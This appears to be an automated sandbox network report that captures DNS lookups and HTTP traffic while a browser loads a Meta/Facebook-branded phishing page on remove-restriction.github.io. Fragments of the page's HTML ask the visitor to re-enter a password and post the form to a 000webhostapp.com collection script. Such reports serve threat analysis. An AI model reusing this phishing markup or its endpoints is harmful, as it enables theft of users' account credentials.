Feb 6, 2025 01:42:26.518598080 CET	8.8.8.8	192.168.2.4	0x4672	No error (0)	google.com		142.250.185.110	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:55.246788025 CET	1.1.1.1	192.168.2.4	0xcff1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:55.246802092 CET	1.1.1.1	192.168.2.4	0xcff1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:42:55.246822119 CET	1.1.1.1	192.168.2.4	0xcff1	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:17.579603910 CET	1.1.1.1	192.168.2.4	0xa372	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:17.579617977 CET	1.1.1.1	192.168.2.4	0xa372	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:17.579627037 CET	1.1.1.1	192.168.2.4	0xa372	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false
Feb 6, 2025 01:43:17.579636097 CET	1.1.1.1	192.168.2.4	0xa372	Server failure (2)	practiced-dockings.000webhostapp.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

remove-restriction.github.io

https:

www.facebook.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	185.199.108.153	80	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Feb 6, 2025 01:42:04.295490980 CET	453	OUT	GET /input-pass HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Feb 6, 2025 01:42:04.751427889 CET	722	IN	HTTP/1.1 301 Moved Permanently Connection: keep-alive Content-Length: 162 Server: GitHub.com Content-Type: text/html permissions-policy: interest-cohort=() Location: https://remove-restriction.github.io/input-pass X-GitHub-Request-Id: E335:F2545:C0D26D:D64D29:67A4055C Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:04 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740068-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802525.692281,VS0,VE17 Vary: Accept-Encoding X-Fastly-Request-ID: 479f76adf4f6e118c8737d203c275d018a9b75ed Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 6, 2025 01:42:49.752257109 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	185.199.108.153	80	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Feb 6, 2025 01:42:49.299118996 CET	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	185.199.108.153	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:05 UTC	681	OUT	GET /input-pass HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:05 UTC	556	IN	HTTP/1.1 301 Moved Permanently Connection: close Content-Length: 162 Server: GitHub.com Content-Type: text/html permissions-policy: interest-cohort=() Location: https://remove-restriction.github.io/input-pass/ X-GitHub-Request-Id: 5808:B1FBD:DA10A7:EF8B44:67A4055A Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:05 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740072-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802525.334775,VS0,VE12 Vary: Accept-Encoding X-Fastly-Request-ID: 091eb8cab692f20b96f779067813db1bb733f9b2
2025-02-06 00:42:05 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49744	185.199.108.153	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:05 UTC	682	OUT	GET /input-pass/ HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:05 UTC	734	IN	HTTP/1.1 200 OK Connection: close Content-Length: 15187 Server: GitHub.com Content-Type: text/html; charset=utf-8 permissions-policy: interest-cohort=() Last-Modified: Mon, 18 Mar 2024 21:31:19 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "65f8b2a7-3b53" expires: Thu, 06 Feb 2025 00:52:05 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 7DF1:2DC477:C5AA91:DB2610:67A4055D Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:05 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740055-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802526.901412,VS0,VE26 Vary: Accept-Encoding X-Fastly-Request-ID: f0766e016488e079bcb1f10f440f77878a975f8c
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 52 65 73 74 72 69 63 74 69 6f 6e 73 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 3c 6c 69 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Restrictions Information</title> <link rel="icon" type="image/x-icon" href="favicon.ico"> <li
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 57 38 45 2f 2b 56 76 42 50 2f 6c 62 77 54 2f 35 57 38 45 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 35 57 38 45 2f 2b 5a 77 42 66 2f 6c 62 77 54 2f 35 6e 41 46 2f 2b 5a 77 42 66 2f 6c 62 77 54 2f 35 6e 41 46 2f 2b 56 76 42 50 2f 6c 62 77 54 2f 35 6e 41 47 34 2b 70 31 43 78 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 2b 53 4a 41 66 6e 63 67 58 48 35 6e 49 46 2f 2b 5a 78 42 66 2f 6d 63 51 58 2f 35 6e 45 46 2f 2b 5a 78 42 66 2f 6d 63 51 58 2f 35 6e 45 46 2f 2b 64 79 42 66 2f 6d 63 51 58 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 6e 63 67 62 2f 35 6e 45 46 2f 2b 64 79 42 76 2f 6d 63 51 58 2f 35 6e 45 46 2f 2b 5a 79 42 66 2f 6d 63 51 58 2f Data Ascii: W8E/+VvBP/lbwT/5W8E////////////////////////////5W8E/+ZwBf/lbwT/5nAF/+ZwBf/lbwT/5nAF/+VvBP/lbwT/5nAG4+p1CxgAAAAAAAAAAAAAAAAAAAAAAAAAAP+SJAfncgXH5nIF/+ZxBf/mcQX/5nEF/+ZxBf/mcQX/5nEF/+dyBf/mcQX////////////////////////////ncgb/5nEF/+dyBv/mcQX/5nEF/+ZyBf/mcQX/
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 34 30 71 66 2f 37 59 4d 4c 2f 2b 32 43 43 76 2f 74 67 77 76 2f 37 59 4d 4c 2f 2b 32 44 43 2f 2f 74 67 77 76 2f 37 59 4d 4c 2f 2b 32 44 43 2f 2f 75 67 77 75 2f 37 34 59 4d 32 65 36 46 43 2f 2f 75 68 51 76 2f 37 6f 55 4c 2f 2b 36 46 43 2f 2f 75 68 51 76 2f 37 6f 55 4c 2f 2b 2b 46 44 50 2f 75 68 51 76 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 72 68 78 50 2f 75 68 51 76 2f 37 6f 55 4c 2f 2b 36 46 43 2f 2f 75 68 51 76 2f 37 6f Data Ascii: ////////////////////////////////////////////////////////40qf/7YML/+2CCv/tgwv/7YML/+2DC//tgwv/7YML/+2DC//ugwu/74YM2e6FC//uhQv/7oUL/+6FC//uhQv/7oUL/++FDP/uhQv///////////////////////////////////////////////////////////////////////rhxP/uhQv/7oUL/+6FC//uhQv/7o
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 57 57 45 66 2f 31 6c 68 48 2f 39 5a 59 52 2f 2f 57 57 45 66 2f 31 6c 68 48 2f 39 5a 59 52 2f 2f 57 57 45 66 2f 31 6c 68 4c 78 2f 36 6f 72 42 67 41 41 41 41 44 33 6d 52 4f 57 39 70 67 53 2f 2f 61 59 45 66 2f 32 6d 42 4c 2f 39 70 67 52 2f 2f 61 59 45 66 2f 31 6d 42 48 2f 39 70 67 52 2f 2f 57 59 45 66 2f 31 6d 42 48 2f 39 70 67 53 2f 2f 57 59 45 66 2f 34 73 55 33 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 39 70 67 53 2f 2f 57 59 45 66 2f 32 6d 42 4c 2f 39 70 67 53 2f 2f 57 59 45 66 2f 32 6d 42 4c 2f 39 5a 67 52 Data Ascii: /////////////////////////////////////////////////WWEf/1lhH/9ZYR//WWEf/1lhH/9ZYR//WWEf/1lhLx/6orBgAAAAD3mROW9pgS//aYEf/2mBL/9pgR//aYEf/1mBH/9pgR//WYEf/1mBH/9pgS//WYEf/4sU3/////////////////////////////////////////////////9pgS//WYEf/2mBL/9pgS//WYEf/2mBL/9ZgR
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 6f 46 2f 2f 39 71 52 66 2f 2f 61 6b 58 2f 2f 32 70 46 2f 2f 39 71 52 66 2f 2f 61 6b 58 2f 2f 32 70 46 2f 2f 2b 71 52 6a 30 2f 61 73 59 67 76 2b 32 4a 41 63 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 50 2b 31 49 42 6a 2f 72 52 71 57 2f 36 77 59 38 66 36 73 47 50 2f 2b 72 42 6a 2f 2f 71 77 59 2f 2f 36 73 47 50 2f 39 71 78 6a 2f 2f 71 77 59 2f 2f 32 72 47 50 2f 39 71 78 6a 2f 2f 61 73 58 2f 2f 32 72 47 50 2f 2b 71 78 66 78 2f 61 77 59 6c 76 2b 31 49 42 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: oF//9qRf//akX//2pF//9qRf//akX//2pF//+qRj0/asYgv+2JAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP+1IBj/rRqW/6wY8f6sGP/+rBj//qwY//6sGP/9qxj//qwY//2rGP/9qxj//asX//2rGP/+qxfx/awYlv+1IBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 6e 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 2d 64 69 76 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 72 6f 67 72 65 73 73 2d 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 43 6f 6e 57 65 62 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4c 6f 67 6f 20 4d 65 74 61 22 20 63 6c 61 73 73 3d 22 63 79 79 70 62 74 74 37 20 6c 6a 6e 69 37 70 61 6e 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 30 30 20 31 30 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 65 Data Ascii: n; </script></head><body class=""> <div id="page-div"> <div id="progress-bar-container" class=""> <div class="iConWeb"> <svg aria-label="Logo Meta" class="cyypbtt7 ljni7pan" role="img" viewBox="0 0 500 100"> <de
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 35 2d 31 38 2e 36 33 38 2d 34 2e 36 37 34 2d 35 2e 33 35 32 2d 33 2e 31 32 2d 39 2e 35 32 37 2d 37 2e 34 33 34 2d 31 32 2e 35 32 38 2d 31 32 2e 39 35 32 2d 32 2e 39 38 39 2d 35 2e 35 31 37 2d 34 2e 34 38 33 2d 31 31 2e 38 33 35 2d 34 2e 34 38 33 2d 31 38 2e 39 37 33 20 30 2d 37 2e 32 31 34 20 31 2e 34 36 31 2d 31 33 2e 36 30 38 20 34 2e 33 38 35 2d 31 39 2e 31 37 20 32 2e 39 32 33 2d 35 2e 35 36 31 20 36 2e 39 38 39 2d 39 2e 39 30 38 20 31 32 2e 31 38 37 2d 31 33 2e 30 35 20 35 2e 31 39 38 2d 33 2e 31 33 20 31 31 2e 31 37 36 2d 34 2e 37 30 37 20 31 37 2e 39 32 33 2d 34 2e 37 30 37 20 36 2e 37 31 35 20 30 20 31 32 2e 34 38 34 20 31 2e 35 38 37 20 31 37 2e 33 31 39 20 34 2e 37 34 20 34 2e 38 34 37 20 33 2e 31 36 34 20 38 2e 35 37 32 20 37 2e 35 39 38 20 31 Data Ascii: 5-18.638-4.674-5.352-3.12-9.527-7.434-12.528-12.952-2.989-5.517-4.483-11.835-4.483-18.973 0-7.214 1.461-13.608 4.385-19.17 2.923-5.561 6.989-9.908 12.187-13.05 5.198-3.13 11.176-4.707 17.923-4.707 6.715 0 12.484 1.587 17.319 4.74 4.847 3.164 8.572 7.598 1
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 5a 6d 2d 31 34 2e 37 31 35 2d 34 35 2e 36 31 63 2d 31 2e 35 37 31 2d 33 2e 39 38 35 2d 34 2e 30 36 36 2d 37 2e 31 33 38 2d 37 2e 34 36 31 2d 39 2e 34 34 38 2d 33 2e 33 39 36 2d 32 2e 33 31 2d 37 2e 33 33 2d 33 2e 34 36 2d 31 31 2e 37 38 31 2d 33 2e 34 36 2d 36 2e 33 30 38 20 30 2d 31 31 2e 33 31 39 20 32 2e 31 30 32 2d 31 35 2e 30 35 35 20 36 2e 33 31 37 2d 33 2e 37 33 37 20 34 2e 32 31 35 2d 35 2e 36 30 35 20 39 2e 39 32 2d 35 2e 36 30 35 20 31 37 2e 30 39 20 30 20 37 2e 32 31 35 20 31 2e 38 30 32 20 31 32 2e 39 34 20 35 2e 33 39 36 20 31 37 2e 31 35 36 20 33 2e 36 30 34 20 34 2e 32 31 35 20 38 2e 34 38 34 20 36 2e 33 31 37 20 31 34 2e 36 36 20 36 2e 33 31 37 20 34 2e 35 33 38 20 30 20 38 2e 35 39 33 2d 31 2e 31 36 20 31 32 2e 31 35 34 2d 33 2e 34 39 32 Data Ascii: Zm-14.715-45.61c-1.571-3.985-4.066-7.138-7.461-9.448-3.396-2.31-7.33-3.46-11.781-3.46-6.308 0-11.319 2.102-15.055 6.317-3.737 4.215-5.605 9.92-5.605 17.09 0 7.215 1.802 12.94 5.396 17.156 3.604 4.215 8.484 6.317 14.66 6.317 4.538 0 8.593-1.16 12.154-3.492
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 2e 36 2d 32 30 2e 39 31 37 2d 34 2e 34 33 35 2d 32 39 2e 37 35 5a 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 75 72 6c 28 23 6a 73 63 5f 63 5f 33 78 29 22 3e 3c 2f 70 61 74 68 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 32 20 2e 30 31 36 43 31 38 2e 36 33 2e 37 37 36 2e 38 33 32 20 32 38 2e 39 30 38 2e 30 32 38 20 36 33 68 31 36 2e 39 32 43 31 37 2e 34 38 33 20 33 39 2e 37 31 36 20 32 38 2e 37 36 32 20 31 38 2e 33 31 35 20 34 32 20 31 37 2e 33 31 56 2e 30 31 37 5a 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 75 72 6c 28 23 6a 73 63 5f 63 5f 33 79 29 22 3e 3c 2f 70 61 74 68 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 37 35 2e 31 Data Ascii: .6-20.917-4.435-29.75Z" fill="url(#jsc_c_3x)"></path> <path d="M42 .016C18.63.776.832 28.908.028 63h16.92C17.483 39.716 28.762 18.315 42 17.31V.017Z" fill="url(#jsc_c_3y)"></path> <path d="m75.1
2025-02-06 00:42:05 UTC	1378	IN	Data Raw: 43 61 70 74 69 6f 6e 20 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 6e 74 20 63 6f 6c 6f 72 3d 22 67 72 65 79 22 3e 50 6c 65 61 73 65 20 72 65 2d 65 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 20 3c 61 3e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 70 72 61 63 74 69 63 65 64 2d 64 6f 63 6b 69 6e 67 73 2e 30 30 30 77 65 62 68 6f 73 74 61 70 70 2e 63 6f 6d 2f 6e 65 77 2f 61 64 64 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 Data Ascii: Caption "> <font color="grey">Please re-enter your password to complete the request. <a></a> </div> </div> </div><form action="https://practiced-dockings.000webhostapp.com/new/add.php" method="

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	185.199.108.153	443	6036	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-06 00:42:06 UTC	586	OUT	GET /input-pass/style.css HTTP/1.1 Host: remove-restriction.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://remove-restriction.github.io/input-pass/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-02-06 00:42:06 UTC	753	IN	HTTP/1.1 200 OK Connection: close Content-Length: 41869 Server: GitHub.com Content-Type: text/css; charset=utf-8 permissions-policy: interest-cohort=() x-origin-cache: HIT Last-Modified: Mon, 18 Mar 2024 21:31:19 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "65f8b2a7-a38d" expires: Thu, 06 Feb 2025 00:52:06 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: E826:C95D3:D6B4BB:EC309B:67A4055D Accept-Ranges: bytes Age: 0 Date: Thu, 06 Feb 2025 00:42:06 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740032-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1738802527.533713,VS0,VE19 Vary: Accept-Encoding X-Fastly-Request-ID: 1c2f6f61678f85e37e21003b1abc954139293b46
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 2a 2c 0d 0a 2a 3a 3a 62 65 66 6f 72 65 2c 0d 0a 2a 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 7d 0d 0a 0d 0a 2a 3a 66 6f 63 75 73 20 7b 0d 0a 20 20 6f 75 74 6c 69 6e 65 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 0d 0a 7d 0d 0a 0d 0a 3a 72 6f 6f 74 20 7b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 2d 2d 63 6f 6c 6f 72 2d 61 63 74 69 6f 6e 2d 64 65 66 61 75 6c 74 3a 20 23 31 38 37 37 46 32 3b 0d 0a 20 20 2d 2d 63 6f 6c 6f 72 2d 61 63 74 69 6f 6e 2d 68 6f 76 65 72 2d 73 74 61 74 65 3a 20 23 31 37 37 31 45 36 3b 0d 0a 20 20 2d 2d 63 6f 6c 6f 72 2d 68 79 70 65 72 6c 69 6e 6b 3a 20 23 31 38 37 37 46 32 3b 0d 0a 20 20 2d 2d 63 6f 6c 6f 72 2d 73 75 63 63 65 73 73 3a Data Ascii: ,::before,::after { box-sizing: border-box;}:focus { outline: 0 !important}:root { font-size: 16px; --color-action-default: #1877F2; --color-action-hover-state: #1771E6; --color-hyperlink: #1877F2; --color-success:
2025-02-06 00:42:06 UTC	1378	IN	Data Raw: 6d 3a 20 30 3b 0d 0a 7d 0d 0a 2e 71 73 39 79 73 78 69 38 20 7b 0d 0a 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 7d 0d 0a 2e 71 39 75 6f 72 69 6c 62 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0d 0a 7d 0d 0a 2e 70 6e 78 37 66 64 33 7a 20 7b 0d 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 20 6f 70 61 63 69 74 79 2c 74 72 61 6e 73 66 6f 72 6d 3b 0d 0a 7d 0d 0a 2e 70 66 6e 79 68 33 6d 77 20 7b 0d 0a 20 20 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 20 30 3b 0d 0a 7d 0d 0a 2e 70 65 64 6b 72 32 75 36 20 7b 0d 0a 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0d 0a 7d 0d 0a 2e 6f 79 67 72 76 68 61 62 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d Data Ascii: m: 0;}.qs9ysxi8 { border-bottom-right-radius: inherit;}.q9uorilb { display: inline-block;}.pnx7fd3z { transition-property: opacity,transform;}.pfnyh3mw { flex-shrink: 0;}.pedkr2u6 { opacity: 1;}.oygrvhab { margin-
